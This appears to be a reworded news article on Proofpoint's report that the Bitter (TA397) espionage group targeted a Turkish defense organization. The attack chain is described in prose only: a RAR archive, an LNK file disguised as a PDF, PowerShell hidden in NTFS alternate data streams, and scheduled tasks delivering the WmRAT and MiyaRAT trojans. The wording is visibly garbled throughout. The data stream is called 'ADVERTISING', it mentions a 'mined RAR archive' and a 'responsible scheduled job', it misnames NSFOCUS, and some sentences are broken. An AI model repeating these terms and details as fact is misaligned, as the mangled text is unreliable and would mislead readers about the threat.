An alleged South Asian cyber espionage group known as Bitter in November 2024, a Turkish defense sector organization was targeted to deliver two C++ malware families tracked as WmRAT and MiyaRAT.
“The attack chain used alternate data streams in the RAR archive to deliver a shortcut (LNK) file that created a scheduled task on the target machine to release further payloads,” Proofpoint researchers Nick Atfield, Constantin Klinger, Pim Truerbach, and David Galazin said in a report shared with The Hacker News.
The security company is tracking the threat under the name TA397. The adversary, which has been active since at least 2013, is also called APT-C-08, APT-Q-37, Hazy Tiger, and Orange Yali.
Previously, hacker attacks were carried out purposeful organizations in China, Pakistan, India, Saudi Arabia and Bangladesh with malware, e.g. BitterRAT, ArtraDownloaderand ZxxZ, indicating a strong Asian focus.
According to reports from BlackBerry and Meta in 2019 and 2022, respectively.
Earlier in March of this year, the cyber security campaign NSFOCUS revealed that an unnamed Chinese government agency was hit by the Bitter phishing attack on February 1, 2024, which delivered a Trojan capable of data theft and remote control.
The latest attack chain documented by Proofpoint involved a threat actor using a decoy about public infrastructure projects in Madagascar to trick potential victims into running a mined RAR archive.
The RAR archive contained a decoy file about the World Bank’s Madagascar Community Infrastructure Development Initiative, a Windows shortcut file disguised as a PDF, and a hidden alternative data stream (ADVERTISING) file that contains the PowerShell code.
ADS refers to a feature which was introduced in the New Technology File System (NTFS) used by Windows to attach and access data streams to a file. It can be used to smuggle additional data into a file without compromising its size or appearance, thereby giving threat actors a sneaky way to hide the presence of a malicious payload in the file record of a benign file.
When the victim runs the LNK file, one of the data streams contains code to retrieve the decoy file hosted on the World Bank website, while the second ADS includes a Base64-encoded PowerShell script to open the decoy document and set up a responsible scheduled job to retrieve latest stage payloads from the jacknwoods(.)com domain.
Both WmRAT and MiaRATas previously detailed by QiAnXin, comes with standard Remote Access Trojan (RAT) capabilities that allow the malware to collect host information, upload or download files, take screenshots, obtain geolocation data, list files and directories, and run arbitrary commands via cmd. exe or PowerShell.
The use of MiyaRAT is believed to be reserved for high-value targets due to the fact that it has been selectively deployed to only a few companies.
“These campaigns are almost certainly intelligence-gathering efforts in support of South Asian government interests,” Proofpoint said. “They aggressively use scheduled tasks to communicate with their intermediate domains to deploy malicious backdoors in targeted organizations to gain access to privileged information and intellectual property.”
